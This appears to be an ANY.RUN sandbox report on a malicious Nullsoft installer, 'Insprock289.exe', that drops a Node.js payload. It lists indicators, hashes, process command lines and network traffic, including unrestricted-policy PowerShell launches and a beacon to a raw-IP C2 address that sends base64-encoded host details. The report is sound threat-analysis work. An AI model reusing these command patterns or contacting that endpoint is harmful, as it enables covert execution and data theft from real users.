File name:

Insprock289.exe

Full analysis: https://app.any.run/tasks/c7f65e13-cbab-4630-88e9-5b41ea1742a5
Verdict: Malicious activity
Analysis date: March 14, 2025, 12:50:13
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
nodejs
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5:

438F0C0D9F12A6D97C0DCE2190832BC0

SHA1:

316794630D95E55385EB806E8544DF718E1EABDA

SHA256:

378FB3F303469B11713DDB68409900EEF42386C0B88FF6BBCB588023174507CC

SSDEEP:

786432:xTOQeCGt28GR7DbkHQarIHtTdQUmdGc/BIhOd:xqQeF28GRPbkHQ9WhdGwBIhG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Insprock289.exe (PID: 5204)

    • Changes powershell execution policy (Unrestricted)

      • Three.exe (PID: 736)

  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • Insprock289.exe (PID: 5204)

    • The process creates files with name similar to system file names

      • Insprock289.exe (PID: 5204)

    • Executable content was dropped or overwritten

      • Insprock289.exe (PID: 5204)

    • Drops 7-zip archiver for unpacking

      • Insprock289.exe (PID: 5204)

    • Process drops legitimate windows executable

      • Insprock289.exe (PID: 5204)

    • Reads security settings of Internet Explorer

      • Insprock289.exe (PID: 5204)

    • Starts application with an unusual extension

      • cmd.exe (PID: 4424)

    • Starts CMD.EXE for commands execution

      • Three.exe (PID: 736)

    • Application launched itself

      • Three.exe (PID: 736)

    • The process bypasses the loading of PowerShell profile settings

      • Three.exe (PID: 736)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 7496)

    • There is functionality for taking screenshot (YARA)

      • Three.exe (PID: 2340)
      • Insprock289.exe (PID: 5204)

    • Connects to the server without a host name

      • Three.exe (PID: 736)

    • Starts POWERSHELL.EXE for commands execution

      • Three.exe (PID: 736)

    • The process hides Powershell's copyright startup banner

      • Three.exe (PID: 736)

  • INFO

    • The sample compiled with english language support

      • Insprock289.exe (PID: 5204)

    • Checks supported languages

      • Insprock289.exe (PID: 5204)
      • Three.exe (PID: 736)
      • chcp.com (PID: 7052)
      • Three.exe (PID: 3300)
      • Three.exe (PID: 2340)

    • Reads the computer name

      • Insprock289.exe (PID: 5204)
      • Three.exe (PID: 736)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)

    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 2384)
      • BackgroundTransferHost.exe (PID: 736)
      • BackgroundTransferHost.exe (PID: 6112)
      • BackgroundTransferHost.exe (PID: 6800)
      • BackgroundTransferHost.exe (PID: 6640)

    • Create files in a temporary directory

      • Insprock289.exe (PID: 5204)

    • Checks proxy server information

      • BackgroundTransferHost.exe (PID: 6640)
      • Three.exe (PID: 736)
      • slui.exe (PID: 6080)

    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 6640)

    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 6640)

    • Process checks computer location settings

      • Three.exe (PID: 736)

    • Changes the display of characters in the console

      • cmd.exe (PID: 4424)

    • Node.js compiler has been detected

      • Three.exe (PID: 736)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)

    • Reads the machine GUID from the registry

      • Three.exe (PID: 736)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7784)
      • powershell.exe (PID: 8092)
      • powershell.exe (PID: 7704)
      • powershell.exe (PID: 2268)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:12:15 22:26:14+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 26624
InitializedDataSize: 473088
UninitializedDataSize: 16384
EntryPoint: 0x338f
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.7.4.0
ProductVersionNumber: 0.7.4.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
CompanyName: Rack
FileDescription: Leave labor wave
FileVersion: 0.7.4
LegalCopyright: Copyright © 2025 Rack
ProductName: Three
ProductVersion: 0.7.4
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
185
Monitored processes
60
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start insprock289.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs three.exe cmd.exe no specs conhost.exe no specs chcp.com no specs three.exe no specs three.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs findstr.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
668\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
672\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
736"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
736C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe
Insprock289.exe
User:
admin
Company:
Rack
Integrity Level:
MEDIUM
Description:
Leave labor wave
Exit code:
134
Version:
0.7.4
Modules
Images
c:\users\admin\appdata\local\temp\2tzicnrzuzfcgickizc2yplrndk\three.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
1012C:\WINDOWS\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"C:\Windows\SysWOW64\cmd.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1280C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1568C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2140C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2240C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2268C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events
106 349
Read events
106 334
Write events
15
Delete events
0

Modification events

(PID) Process:(2384) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2384) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2384) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6640) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6640) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6640) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(736) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(736) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(736) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6112) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
Executable files
17
Suspicious files
128
Text files
68
Unknown types
0

Dropped files

PID
Process
Filename
Type
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\app-32.7z
MD5:
SHA256:
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\icudtl.dat
MD5:
SHA256:
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\LICENSES.chromium.html
MD5:
SHA256:
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\nsis7z.dllexecutable
MD5:80E44CE4895304C6A3A831310FBF8CD0
SHA256:B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\am.pakbinary
MD5:4CB768DDAB29DC30E3E0676E9FE403DC
SHA256:EEF0AE38C894B68003537E399C47AEA82E99586A43791C3EB53A8A4957564E8E
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\chrome_100_percent.pakbinary
MD5:001AA2A7D5DCAF2D0987804A37E21DB9
SHA256:0B84B7680630DD51CB36A2FCDD7CC3B031636FE6B91F81772822BE9E514132FE
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\chrome_200_percent.pakbinary
MD5:749E5FF4A826E7FFE8421634520B7E61
SHA256:8E2AFD2AD5BD4F4EDFE739AD503FF6896410D097665D40E99C56C440A8EBC36E
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\System.dllexecutable
MD5:0D7AD4F45DC6F5AA87F606D0331C6901
SHA256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\bn.pakbinary
MD5:0BB8E336602F7E8A70F6EB3EAA7931A6
SHA256:C951C3C7E565C6ECA836DD815FF92F92BC9931C400A56EE4C45E4DBCED547153
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\af.pakbinary
MD5:734923E7E3B505564F4A2D01AD1CFED9
SHA256:8E6AF9FA4332E027ED629EBCAC60630294E23738706FF35E77432A8CA1304F50
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
31
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.183:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2104
svchost.exe
GET
200
23.48.23.183:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6640
BackgroundTransferHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4740
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6228
SIHClient.exe
GET
200
23.222.82.102:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6228
SIHClient.exe
GET
200
23.222.82.102:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
736
Three.exe
GET
200
217.197.107.91:80
http://217.197.107.91/login.php?event=init&id=dGVzdA==&data=&data=NCBHQl9bb2JqZWN0IE9iamVjdF1fTWljcm9zb2Z0IEJhc2ljIERpc3BsYXkgQWRhcHRlcl9mYWxzZV91bmRlZmluZWR4NzIwX1dpbmRvd3MgMTAgRW50ZXJwcmlzZV8xOSBtaW51dGVzICgwLjMyIGhvdXJzKV9DOlxVc2Vyc1xhZG1pbl9ERVNLVE9QLUpHTExKTERfYWRtaW5fV2luZG93c19OVF9pYTMyXzEwLjAuMTkwNDVfQzpcVXNlcnNcYWRtaW5cQXBwRGF0YVxSb2FtaW5nX0M6XFVzZXJzXGFkbWluXEFwcERhdGFcTG9jYWxcVGVtcF9ERVNLVE9QLUpHTExKTERfX0FNRDY0IEZhbWlseSA2IE1vZGVsIDE0IFN0ZXBwaW5nIDMsIEF1dGhlbnRpY0FNRF94ODZfQzpfNF9DOlxVc2Vyc1xhZG1pblxBcHBEYXRhXExvY2FsXFRlbXBcMnR6aWNuUlp1WmZDR0lja0laQzJZUGxuZEtcVGhyZWUuZXhl
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
192.168.100.255:138
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.183:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
23.48.23.183:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
6544
svchost.exe
20.190.160.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
20.190.160.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4740
backgroundTaskHost.exe
20.31.169.57:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.174
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.48.23.183
  • 23.48.23.177
  • 23.48.23.141
  • 23.48.23.150
  • 23.48.23.139
  • 23.48.23.194
  • 23.48.23.169
  • 23.48.23.180
  • 23.48.23.176
whitelisted
login.live.com
  • 20.190.160.67
  • 20.190.160.17
  • 40.126.32.133
  • 40.126.32.134
  • 40.126.32.72
  • 40.126.32.76
  • 20.190.160.65
  • 20.190.160.22
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
www.bing.com
  • 2.19.122.55
  • 2.19.122.59
  • 2.19.122.65
  • 2.19.122.54
  • 2.19.122.63
  • 2.19.122.57
  • 2.19.122.64
  • 2.19.122.60
  • 2.19.122.58
whitelisted
www.google.com
  • 142.250.186.164
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Insprock289.exe